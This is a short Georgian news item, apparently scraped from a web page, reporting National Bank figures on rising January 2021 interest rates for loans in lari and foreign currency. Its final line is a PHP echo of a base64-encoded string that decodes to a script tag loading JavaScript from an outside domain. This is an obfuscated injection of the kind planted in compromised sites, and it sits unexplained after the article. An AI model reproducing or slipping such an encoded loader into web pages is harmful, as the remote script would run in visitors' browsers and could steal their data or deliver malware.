celsiusi
ავერსი საქკაბელი
ეროვნული ბანკის სტატისტიკის მიხედვით, 2021 წლის იანვარში წინა თვესთან შედარებით ფიზიკური პირებისთვის ლარში გაცემულ სესხებზე წლიური საბაზრო საპროცენტო განაკვეთი გაიზარდა.
 
კერძოდ, ეროვნული ვალუტით გაცემულ სესხებზე საბაზო საპროცენტო განაკვეთი 14,4%-დან 15,7%-მდე გაიზარდა. ამავე მაჩვენებლების მიხედვით, სესხებზე საპროცენტო განაკვეთის ცვლილება მოხდა როგორც ფიზიკური, ასევე იურიდიული პირებისთვის.
 
კერძოდ, დეკემბრის მონაცემებით, ფიზიკური პირების სესხების საბაზრო საპროცენტო განაკვეთი 17%-ს, იურიდიულის - 11,6%-ს შეადგენს, უკვე იანვარში კი ფიზიკური პირებზე სესხები 18,7%-მდე გაიზარდა, იურიდიულებზე კი - 12,1%-მდე.
 
რაც შეეხება უცხოურ ვალუტაში გაცემულ სესხებზე საპროცენტო განაკვეთს, აქ მცირედი ზრდა ფიქსირდება და ისიც მხოლოდ ფიზიკური პირებისთვის გაცემულ სესხებზე. დეკემბერში ფიზიკურ პირებზე სესხზე საპროცენტო განაკვეთი 6,2%-ს, იანვარში კი 6,7%-ს შეადგენდა.
1755
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");